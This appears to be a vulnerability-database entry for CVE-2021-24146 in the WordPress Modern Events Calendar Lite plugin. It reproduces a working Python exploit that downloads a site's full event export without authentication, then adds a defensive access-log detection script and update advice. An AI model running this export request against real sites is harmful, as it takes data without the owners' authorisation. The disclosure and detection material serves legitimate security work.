| Title | Published | Views | Family |
|---|---|---|---|
| Wordpress Modern Events Calendar 5.16.2 Plugin - Event export (Unauthenticated) Exploit | 2 Jul 2021 00:00 | – | zdt |
| CVE-2021-24146 | 18 Mar 2021 17:32 | – | circl |
| Wordpress Modern Events Calendar Lite Access Control Error Vulnerability | 18 Mar 2021 00:00 | – | cnnvd |
| CVE-2021-24146 | 18 Mar 2021 14:57 | – | cve |
| CVE-2021-24146 Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export | 18 Mar 2021 14:57 | – | cvelist |
| Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated) | 2 Jul 2021 00:00 | – | exploitdb |
| WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure | 6 Jun 2026 03:01 | – | nuclei |
| CVE-2021-24146 | 18 Mar 2021 15:15 | – | nvd |
| Format string | 18 Mar 2021 15:15 | – | prion |
| PT-2021-15692 · WordPress · Modern Events Calendar Lite | 18 Mar 2021 00:00 | – | ptsecurity |
```python
# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated)
# Date 01.07.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://webnus.net/modern-events-calendar/
# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip
# Version: Before 5.16.5
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24146
# CWE: CWE-863, CWE-284
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24146/README.md
'''
Description:
Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin,
versions before 5.16.5, did not properly restrict access to the export files,
allowing unauthenticated users to export all events data, for example in CSV or XML format.
'''
'''
Banner:
'''
# Raw string so the backslashes in the ASCII art are not read as escape sequences
banner = r"""
_______ ________ ___ ____ ___ ___ ___ __ __ _____ __ _____
/ ____/ | / / ____/ |__ \ / __ \__ \< / |__ \/ // /< / // / / ___/
/ / | | / / __/________/ // / / /_/ // /_______/ / // /_/ / // /_/ __ \
/ /___ | |/ / /__/_____/ __// /_/ / __// /_____/ __/__ __/ /__ __/ /_/ /
\____/ |___/_____/ /____/\____/____/_/ /____/ /_/ /_/ /_/ \____/
* WordPress Plugin Modern Events Calendar Lite < 5.16.2 - Export Event Data (Unauthenticated)
* @Hacker5preme
"""
print(banner)
'''
Import required modules:
'''
import requests
import argparse
import csv
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calendar Export Event Data (Unauthenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
'''
Exploit:
'''
print('')
print('[+] Exported Data: ')
print('')
# The export action is requested without any session cookie or nonce
exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + '/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv'
answer = requests.get(exploit_url)
decoded_content = answer.content.decode('utf-8')
# The response body is the CSV export; print it row by row
cr = csv.reader(decoded_content.splitlines(), delimiter=',')
my_list = list(cr)
for row in my_list:
    print(row)
```
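The request the script sends leaves a recognisable query string in web server access logs. The following detection sketch is an added example, not part of the original exploit entry; it assumes Combined Log Format, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format (assumed): ip ident user [time] "METHOD target PROTO" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')

def export_query(target):
    """Return the parsed query if target invokes the MEC export action, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith('/wp-admin/admin.php'):
        return None
    q = parse_qs(parts.query)  # decodes percent-encoding, ignores parameter order
    if 'MEC-ix' in q.get('page', []) and 'export-events' in q.get('mec-ix-action', []):
        return q
    return None

def find_export_requests(lines):
    """Return one record per log line that requested the events export."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        q = export_query(m['target']) if m else None
        if q is None:
            continue
        hits.append({
            'ip': m['ip'], 'time': m['time'], 'status': int(m['status']),
            'format': q.get('format', ['?'])[0],
            # 200 with a body: export data was returned. A 302 is the usual
            # WordPress redirect to the login page for unauthenticated wp-admin requests.
            'served': m['status'] == '200' and m['size'] not in ('-', '0'),
        })
    return hits

# Constructed sample lines (documentation-range addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Jul/2021:10:15:01 +0000] "GET /wp-admin/admin.php?page=MEC-ix'
    '&tab=MEC-export&mec-ix-action=export-events&format=csv HTTP/1.1" 200 18234 "-" "-"',
    '198.51.100.20 - - [02/Jul/2021:10:16:40 +0000] "GET /blog/wp-admin/admin.php?format=xml'
    '&mec-ix-action=export%2Devents&page=MEC%2Dix HTTP/1.1" 302 0 "-" "-"',
    '192.0.2.44 - - [02/Jul/2021:10:20:12 +0000] "GET /wp-admin/admin.php?page=MEC-ix'
    '&tab=MEC-export HTTP/1.1" 200 40211 "-" "-"',
]

if __name__ == '__main__':
    for hit in find_export_requests(SAMPLE_LOG):
        print(hit)
```

Access logs in this format do not record whether a session cookie was sent, so each hit with `served` set still has to be compared against known administrator activity. Sites running a version before 5.16.5 should be updated.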